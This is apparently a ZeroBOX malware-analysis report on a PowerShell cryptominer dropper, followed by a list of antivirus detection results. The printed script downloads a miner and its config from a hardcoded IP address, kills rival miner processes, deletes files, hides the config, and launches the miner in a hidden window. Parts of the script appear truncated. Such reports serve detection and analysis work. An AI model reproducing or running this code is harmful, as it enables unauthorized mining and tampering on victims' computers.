Static | ZeroBOX
No static analysis available.
$ne = $MyInvocation.MyCommand.Path
$miner_url = "http://1.255.85.176:8080/Wuck/s.rar"
$miner_name = "javas"
$miner_cfg_url = "http://1.255.85.176:8080/Wuck/config.json"
$miner_cfg_name = "config.json"
$miner_path = "$env:TMP\javas.exe"
$miner_cfg_path = "$env:TMP\config.json"
function Update($url,$path,$proc_name)
{
Get-Process -Name $proc_name | Stop-Process
Remove-Item $path
Try {
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($url,$path)
Catch {
Write-Output "donwload with backurl"
$javas=Get-Process -Name javas |select-object CPU
$javas=$javas -Replace 'CPU','' -Replace '@{=','' -Replace '}',''
$javas=[int32]$javas
##Write-Output $javas
if($javas -lt 500){
Get-Process -Name javas | Stop-Process
}else{
cmd /c taskkill /f /im dsm.exe
cmd /c taskkill /f /im dom.exe
cmd /c del /f /q C:\Windows\System32\config\systemprofile\dom\*
cmd /c taskkill /f /im WindowsUpdate.exe
cmd /c del /f /q C:\Windows\temp\WindowsUpdate.exe
Start-Sleep -s 2
if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))
cmd.exe /c attrib -s -h -r %tmp%\config.json
cmd.exe /c attrib -s -h -r C:\Windows\temp\config.json
cmd.exe /c rd /s /q %tmp%\config.json
cmd.exe /c rd /s /q C:\Windows\temp\config.json
Update $miner_url $miner_path $miner_name
Update $miner_cfg_url $miner_cfg_path $miner_cfg_name
cmd.exe /c attrib +R +S +H %tmp%\config.json
cmd.exe /c attrib +R +S +H C:\Windows\temp\config.json
Start-Process $miner_path -windowstyle hidden
Write-Output "Miner Running"
##Start-Process cmd.exe "/c $killmodule_path" -windowstyle hidden
cmd /c taskkill /f /im shella.exe
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.PowerShell.4!c
tehtris Clean
Cynet Malicious (score: 99)
CTX powershell.miner.generic
CAT-QuickHeal Clean
Skyhigh Artemis!Trojan
ALYac Generic.PWSH.Miner.D.B2D9DF8E
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Scr.Malcode!gen
ESET-NOD32 PowerShell/CoinMiner.BW
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Generic.PWSH.Miner.D.B2D9DF8E
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Generic.PWSH.Miner.D.B2D9DF8E
Tencent Script.Trojan.Generic.Qzfl
Sophos Clean
F-Secure Trojan.TR/PShell.Miner.G
DrWeb PowerShell.DownLoader.1760
VIPRE Generic.PWSH.Miner.D.B2D9DF8E
TrendMicro Clean
CMC Clean
Emsisoft Generic.PWSH.Miner.D.B2D9DF8E (B)
huorong Clean
FireEye Generic.PWSH.Miner.D.B2D9DF8E
Jiangmin Clean
Varist ABMiner.WDSN-6
Avira TR/PShell.Miner.G
Fortinet Clean
Antiy-AVL Clean
Kingsoft Script.Trojan.Generic.a
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.PWSH.Miner.D.B2D9DF8E
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Generic
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Downloader/PowerShell.Miner.SC197176
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan.PowerShell.Coinminer
MaxSecure Clean
GData Generic.PWSH.Miner.D.B2D9DF8E
AVG Script:SNH-gen [Trj]
Panda Clean
alibabacloud Miner:Win/CoinMiner.BI
No IRMA results available.